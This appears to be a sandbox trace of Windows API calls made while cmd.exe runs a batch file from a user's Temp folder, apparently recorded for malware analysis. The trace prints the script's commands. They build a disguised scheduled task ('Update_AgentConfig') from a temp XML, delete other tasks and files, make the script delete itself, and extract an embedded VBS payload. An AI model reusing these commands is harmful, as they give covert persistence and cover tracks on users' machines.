[0375.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n", cbMultiByte=94, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\n") returned 94
[0375.727] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0375.727] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.727] GetFileType (hFile=0x5c) returned 0x1
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0375.727] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n3-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n") returned 32
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.728] GetFileType (hFile=0x5c) returned 0x1
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.728] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.728] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n") returned 35
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.729] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] GetFileType (hFile=0x5c) returned 0x1
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.729] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2699, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.729] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\n") returned 32
[0375.729] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.730] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.730] GetFileType (hFile=0x5c) returned 0x1
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.730] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2777, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.730] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n", cbMultiByte=78, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n") returned 78
[0375.730] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.731] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.731] GetFileType (hFile=0x5c) returned 0x1
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.731] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2807, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.731] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Delete /TN \\Z11 /f\r\n", cbMultiByte=30, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="schtasks /Delete /TN \\Z11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n") returned 30
[0375.731] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.732] GetFileType (hFile=0x5c) returned 0x1
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.732] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2829, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\MMM.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%TEMP%\\MMM.TMP\"\r\nZ11 /f\r\n") returned 22
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] GetFileType (hFile=0x5c) returned 0x1
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.733] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\TTT.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%TEMP%\\TTT.TMP\"\r\n") returned 22
[0375.733] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.733] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] GetFileType (hFile=0x5c) returned 0x1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.734] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2871, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\a.xml\"\r\n", cbMultiByte=20, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\a.xml\"\r\n\r\n") returned 20
[0375.734] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.734] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.734] GetFileType (hFile=0x5c) returned 0x1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.735] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\Z11.xml\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\Z11.xml\"\r\n") returned 22
[0375.735] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.735] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.735] GetFileType (hFile=0x5c) returned 0x1
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.736] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2919, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\check01.txt\"\r\n", cbMultiByte=26, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\check01.txt\"\r\n/f\r\n") returned 26
[0375.736] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.736] GetFileType (hFile=0x5c) returned 0x1
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="(goto) 2>nul & del \"%~f0\"\r\n", cbMultiByte=27, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="(goto) 2>nul & del \"%~f0\"\r\nf\r\n") returned 27
[0375.737] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.737] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.737] GetFileType (hFile=0x5c) returned 0x1
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.738] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.738] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2956, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="endlocal\r\n", cbMultiByte=10, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="endlocal\r\nul & del \"%~f0\"\r\n") returned 10
[0375.738] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.738] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.738] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.738] GetFileType (hFile=0x5c) returned 0x1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.739] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2965, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.739] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="exit /b\r\n\n") returned 9
[0375.739] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.739] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.739] GetFileType (hFile=0x5c) returned 0x1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.740] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2967, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.740] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="\r\nit /b\r\n") returned 2
[0375.740] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.740] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.740] GetFileType (hFile=0x5c) returned 0x1
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.741] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.741] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2978, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.741] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":writeHex\r\n", cbMultiByte=11, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr=":writeHex\r\nl & del \"%~f0\"\r\n") returned 11
[0375.741] _close (_FileHandle=3) returned 0
[0375.741] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0375.742] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.742] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0375.743] _get_osfhandle (_FileHandle=0) returned 0x3
[0375.743] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0375.743] SetConsoleInputExeNameW () returned 0x1
[0375.743] GetConsoleOutputCP () returned 0x1b5
[0375.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0375.744] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0375.744] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.744] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0375.744] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.745] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2978, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.745] GetProcessHeap () returned 0x200000
[0375.745] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0375.745] GetProcessHeap () returned 0x200000
[0375.745] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0375.745] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0f0 | out: hHeap=0x200000) returned 1
[0375.746] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.746] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.747] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x390, lpOverlapped=0x0) returned 1
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=3038, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" findstr /r \"^[^a-z]*:::\" \"%~f0\" >\"%temp%\\writebin.vbs\"\r\n", cbMultiByte=60, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr=" findstr /r \"^[^a-z]*:::\" \"%~f0\" >\"%temp%\\writebin.vbs\"\r\n") returned 60
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] GetFileType (hFile=0x5c) returned 0x1
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.748] GetProcessHeap () returned 0x200000
[0375.748] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22a820
[0375.749] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x1ee840, lpFilePart=0x1ee3b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1ee3b0*="check01.bat") returned 0x30
[0375.749] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="Users", cAlternateFileName="")) returned 0x22e840
[0375.749] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.749] memcpy (in: _Dst=0x1ee846, _Src=0x1ee10c, _Size=0xa | out: _Dst=0x1ee846) returned 0x1ee846
[0375.749] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x22e840
[0375.749] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.750] _wcsnicmp (_String1="KEECFM~1", _String2="KEECFM~1", _MaxCount=0x8) returned 0
[0375.750] _wcsicmp (_String1="kEecfMwgj", _String2="KEECFM~1") returned -7
[0375.750] memcpy (in: _Dst=0x1ee852, _Src=0x1ee314, _Size=0x10 | out: _Dst=0x1ee852) returned 0x1ee852
[0375.750] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="AppData", cAlternateFileName="")) returned 0x22e840
[0375.750] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.750] memcpy (in: _Dst=0x1ee864, _Src=0x1ee10c, _Size=0xe | out: _Dst=0x1ee864) returned 0x1ee864
[0375.750] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x495cf440, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x495cf440, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="Local", cAlternateFileName="")) returned 0x22e840
[0375.751] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.751] memcpy (in: _Dst=0x1ee874, _Src=0x1ee10c, _Size=0xa | out: _Dst=0x1ee874) returned 0x1ee874
